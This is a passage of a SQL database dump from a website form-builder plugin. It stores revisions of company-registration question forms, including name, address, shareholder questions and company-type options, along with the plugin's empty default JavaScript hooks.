jpeg, png, gif, doc, docx, xls, xlsx*:*w_extension*:*2000*:*w_max_size*:*yes*:*w_required*:*yes*:*w_multiple*:**:*w_class*:**:*new_field*:*64*:*id*:*type_editor*:*type*:*custom_64*:*w_field_label*:*<h2><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Before you submit?</span></h2><p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">Review the details of your submission.</span><br><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\"> Please be patient, after you submit the form, it will take 20-30 seconds to upload</span></p><hr>*:*w_editor*:**:*new_field*:*66*:*id*:*type_submit_reset*:*type*:*type_submit_reset_66*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*65*:*id*:*type_star_rating*:*type*:*Was the form easy to complete?:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*5*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(89,1,17,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',1,1,'#**id**##**label**##****#','','0','none','false','true','','','',0,'testmode','','',0,'',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(90,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',1,1,'#**id**##**label**##****#','','0','none','false','true','','','',0,'testmode','','',0,'',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(91,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\" style=\"\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Phone:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - Is there more then one shareholder?%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',12,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(92,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Phone:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - Is there more then one shareholder?%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',12,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0),(93,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Phone:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - Is there more then one shareholder?%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',12,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0),(94,0,18,'Getting Started','','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Phone:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\" style=\"\">%12 - custom_12%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - Is there more then one shareholder?%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\">%13 - custom_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',14,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Phone:#**label**#type_phone#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<p>Are you and the other directors / shareholders involved in running the business</p>*:*w_editor*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_editor*:*type*:*custom_13*:*w_field_label*:*<p>is there more then one shareholder where one shareholder owns 50% and the other shareholders owns the other 50%<br>The shareholding percentage (%) will depend on your circumstance.&nbsp;</p>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0),(95,0,19,'Which company is right for me','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',1,1,'#**id**##**label**##****#','','0','none','false','true','','','',0,'testmode','','',0,'',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(96,0,19,'Which company is right for me','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - The being registered is a:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - custom_2%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Does the company have more than 1 shareholders:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',4,1,'1#**id**#The being registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#The being registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_radio*:*type*:*The being registered is a:*:*w_field_label*:*180*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*For Profit company***Non-profit company***Professional company*:*w_choices*:*false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*For Profit company***Non-profit company***Professional company*:*w_choices_value*:********:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<ul><li>For profit company - a company that generates a profit for it\'s owners<br></li><li>Non-Profit company - a company that is a NGO or organisation where the profits/surplus are not distributed to any individual or entity<br data-mce-bogus=\"1\"></li><li>Professional company - a company registered by Lawyers, Doctors or Accountants<br data-mce-bogus=\"1\"></li></ul>*:*w_editor*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Does the company have more than 1 shareholders:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(97,1,19,'Which company is right for me','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - The being business to registered is a:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - custom_2%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Does the company have more than 1 shareholders:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// 